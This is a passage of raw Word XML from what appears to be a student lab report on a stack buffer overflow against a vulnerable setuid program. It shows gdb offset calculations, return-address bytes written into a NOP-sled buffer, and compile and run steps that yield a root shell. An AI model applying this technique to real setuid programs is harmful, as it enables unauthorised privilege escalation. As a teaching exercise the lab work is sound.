          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(gdb)i r $ebp  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B69E427" w14:textId="0EE6EDDB"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And the base pointer address is 0xbffff158</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139D1D00" w14:textId="77777777" w:rsidR="0012099B" w:rsidRPr="000941B1" w:rsidRDefault="0012099B" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BAA0430" w14:textId="77777777" w:rsidR="002465BD" w:rsidRPr="000941B1" w:rsidRDefault="002465BD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051C31E9" w14:textId="6BC03B6A" w:rsidR="00076171" w:rsidRPr="000941B1" w:rsidRDefault="00076171"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2F8504ED" wp14:editId="1D1AD516">
            <wp:extent cx="5943600" cy="3537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7585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B44F63" w14:textId="485668CC" w:rsidR="0012099B" w:rsidRPr="000941B1" w:rsidRDefault="0012099B" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C4D4DDF" w14:textId="77777777"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 xml:space="preserve">The next instruction at 0x08048491 is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB129D8" w14:textId="77777777"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lea -0x20(%ebp), %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139F2866" w14:textId="7A640B9B"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The buffer is the first variable of the function and according to the above instruction the buffer is located -0x20 bytes i.e. 32 bytes  below the base pointer address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDD9E3B" w14:textId="6B1E3D68"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 xml:space="preserve">We know the Return Address is located 4 bytes below the return address the buffer is located 36 bytes below the Return Address. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0226A19E" w14:textId="1F12CDFE" w:rsidR="0012099B" w:rsidRPr="000941B1" w:rsidRDefault="0012099B" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C4DC92A" w14:textId="7F4B1C08"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Using the above calculation we can overwrite the return address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7F59C9" w14:textId="29E54091" w:rsidR="0012099B" w:rsidRPr="000941B1" w:rsidRDefault="0012099B"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We know that the Base pointer address is 0xbffff158.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D1969F" w14:textId="28BFC51E" w:rsidR="00B743A4" w:rsidRPr="000941B1" w:rsidRDefault="00B743A4"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The Return address is 4 bytes plus the base pointer address. Our buffer is 517 bytes long with the end of buffer filled with shellcode</w:t>
      </w:r>
      <w:r w:rsidR="007E4FDD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can choose an </w:t>
      </w:r>
      <w:r w:rsidR="007E4FDD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>address to overwrite the Return Address</w:t>
      </w:r>
      <w:r w:rsidR="000941B1" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007E4FDD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">because all the addresses after Return Address are filled with NOPs till the shellcode. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D73DB73" w14:textId="14CE5F7B"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Return Address</w:t>
      </w:r>
      <w:r w:rsidR="000941B1" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0xbffff232</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> will allow the program control to jump to NOP instructions which will eventually execute the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFF9529" w14:textId="170A304C" w:rsidR="00D80508" w:rsidRPr="000941B1" w:rsidRDefault="00D80508" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CEB8462" w14:textId="1ECEEA01" w:rsidR="00D80508" w:rsidRPr="000941B1" w:rsidRDefault="00D80508"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02F3F997" wp14:editId="3287445B">
            <wp:extent cx="4625340" cy="545157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7983" cy="5478263"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="651168BD" w14:textId="67EBF65F" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B15DAC8" w14:textId="77777777" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B36F62" w14:textId="77777777" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B71352" w14:textId="77777777" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2CD777" w14:textId="77777777" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65EDB163" w14:textId="77777777" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="625780F0" w14:textId="5552D622"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Hence,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A37A69" w14:textId="5AE918F2"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lastRenderedPageBreak/>
        <w:t>(*buffer+36)= 0x</w:t>
      </w:r>
      <w:r w:rsidR="00B82992" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F86E94E" w14:textId="1F513205"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(*buffer+37)= 0x</w:t>
      </w:r>
      <w:r w:rsidR="00B82992" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B55B3EE" w14:textId="11F3E98A"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(*buffer+38)= 0x</w:t>
      </w:r>
      <w:r w:rsidR="00B82992" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ff</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FC095D" w14:textId="6878E933"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(*buffer+39)= 0x</w:t>
      </w:r>
      <w:r w:rsidR="00B82992" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bf</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4E7375" w14:textId="55B030AF" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="634899F7" w14:textId="4FFBEFB0" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD"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t>Add the above code in the exploit.c and shellcode to the end of buffer using a for loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F272101" w14:textId="6B29E393" w:rsidR="009427C2" w:rsidRPr="000941B1" w:rsidRDefault="009427C2" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="410C71CB" w14:textId="6468EE7C" w:rsidR="009427C2" w:rsidRPr="000941B1" w:rsidRDefault="00B82992" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2891F1DA" wp14:editId="431922DD">
            <wp:extent cx="5943600" cy="4549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49140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CBCE19" w14:textId="684783D0" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0647C5" w14:textId="77777777" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EEF38D5" w14:textId="6ABB1767" w:rsidR="0012099B" w:rsidRPr="000941B1" w:rsidRDefault="0012099B" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="267DAE99" w14:textId="77777777" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35FF402A" w14:textId="77777777" w:rsidR="0012099B" w:rsidRPr="000941B1" w:rsidRDefault="0012099B" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598E1990" w14:textId="77777777" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Compile the exploit.c using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B3625B" w14:textId="3B7787CC" w:rsidR="00076171" w:rsidRPr="000941B1" w:rsidRDefault="007E4FD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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> gcc -o exploit exploit.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A178D2" w14:textId="5A0C0819" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FD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and run it using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9F9860" w14:textId="14A82F07" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FD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./exploit.c    //bad file is generated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1320CE27" w14:textId="5273FEB1" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FD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Run the stack.c program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FEBAE5" w14:textId="59AEBF57" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>./stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A3E946" w14:textId="77777777" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD10510" w14:textId="2C507294" w:rsidR="00076171" w:rsidRPr="000941B1" w:rsidRDefault="00831FCF"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296D706E" wp14:editId="667EF1B8">
            <wp:extent cx="5943600" cy="3288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8665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2548518A" w14:textId="12C3AE09" w:rsidR="006E1465" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The # indicates a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F83E3F" w14:textId="3E9FF7CD" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F2539C" w14:textId="007E3CE0" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F20F82" w14:textId="32498F33" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B075381" w14:textId="731B4A59" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79002F9D" w14:textId="172FA0D5" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1939DC87" w14:textId="5BCDF604" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0763E288" w14:textId="1DF61E2D" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D68D8CD" w14:textId="77777777" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E1125BF" w14:textId="77777777" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6. It should be  noted that although we have obtained the “#” prompt, your real user id is still yourself (the effective user id is now root). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032533E6" w14:textId="0ED550E7" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">You can check this by typing: # id </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03812560" w14:textId="638BBED7" w:rsidR="006E1465" w:rsidRPr="000941B1" w:rsidRDefault="006E1465"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225F35C9" wp14:editId="37E03BFE">
            <wp:extent cx="5943600" cy="2066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6290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6570A991" w14:textId="77777777" w:rsidR="00B82992" w:rsidRPr="000941B1" w:rsidRDefault="00B82992" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="047FD07F" w14:textId="77777777" w:rsidR="00B82992" w:rsidRPr="000941B1" w:rsidRDefault="00B82992" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7702C7C1" w14:textId="2E260AF9" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
